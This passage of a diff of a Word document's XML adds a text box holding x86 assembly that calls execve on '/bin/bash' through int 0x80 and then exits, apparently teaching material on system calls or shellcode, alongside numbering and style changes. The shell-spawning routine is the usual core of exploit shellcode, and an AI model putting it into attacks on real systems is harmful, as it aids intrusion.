+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $0x80</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Textfeld 12" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:12.4pt;width:252pt;height:404.75pt;z-index:251667456;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>.</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>data</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>Bash</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        .</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>asciz</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> "/bin/</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>bash</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>"</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    Null1:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        .</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> 0</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>AddrToBash</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        .</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> 0</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    Null2:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        .</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> 0</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>.</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>text</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    .</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>globl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> _</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>start</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>_</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>start</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    # </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>Execve</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>routine</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>Bash</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">, </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>AddrToBash</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $11, %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>eax</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>Bash</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ebx</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>AddrToBash</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ecx</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $Null2, %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>edx</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $0x80</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    # Exit Routine</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    Exit:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $1, %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>eax</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $10, %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ebx</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $0x80</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId12"/>
+      <w:headerReference w:type="default" r:id="rId18"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1134" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -862,95 +4119,9 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:abstractNum w:abstractNumId="0">
-    <w:nsid w:val="335F6FA2"/>
+    <w:nsid w:val="2B0F192C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="D21065DE"/>
-    <w:lvl w:ilvl="0" w:tplc="0407000F">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%1."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04070019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="0407001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="2160" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="0407000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2880" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="04070019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="0407001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="4320" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="0407000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="04070019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="0407001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="6480" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1">
-    <w:nsid w:val="51B3758A"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="2512A3B2"/>
+    <w:tmpl w:val="D8663992"/>
     <w:lvl w:ilvl="0" w:tplc="04070001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -1060,10 +4231,96 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1">
+    <w:nsid w:val="335F6FA2"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="D21065DE"/>
+    <w:lvl w:ilvl="0" w:tplc="0407000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04070019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0407001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0407000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04070019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0407001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0407000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04070019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0407001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:abstractNum w:abstractNumId="2">
-    <w:nsid w:val="54D36AF2"/>
+    <w:nsid w:val="51B3758A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="402AFE5E"/>
+    <w:tmpl w:val="2512A3B2"/>
     <w:lvl w:ilvl="0" w:tplc="04070001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -1174,9 +4431,9 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="3">
-    <w:nsid w:val="7456576A"/>
+    <w:nsid w:val="54D36AF2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="77AEE18C"/>
+    <w:tmpl w:val="402AFE5E"/>
     <w:lvl w:ilvl="0" w:tplc="04070001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -1286,16 +4543,132 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4">
+    <w:nsid w:val="7456576A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="77AEE18C"/>
+    <w:lvl w:ilvl="0" w:tplc="04070001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="2">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="2">
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="4">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="3">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
-  <w:num w:numId="4">
+  <w:num w:numId="5">
     <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>
@@ -1733,6 +5106,25 @@
       <w:color w:val="4F81BD" w:themeColor="accent1"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Beschriftung">
+    <w:name w:val="caption"/>
+    <w:basedOn w:val="Standard"/>
+    <w:next w:val="Standard"/>
+    <w:uiPriority w:val="35"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="008B1A26"/>
+    <w:pPr>
+      <w:spacing w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="4F81BD" w:themeColor="accent1"/>
+      <w:sz w:val="18"/>
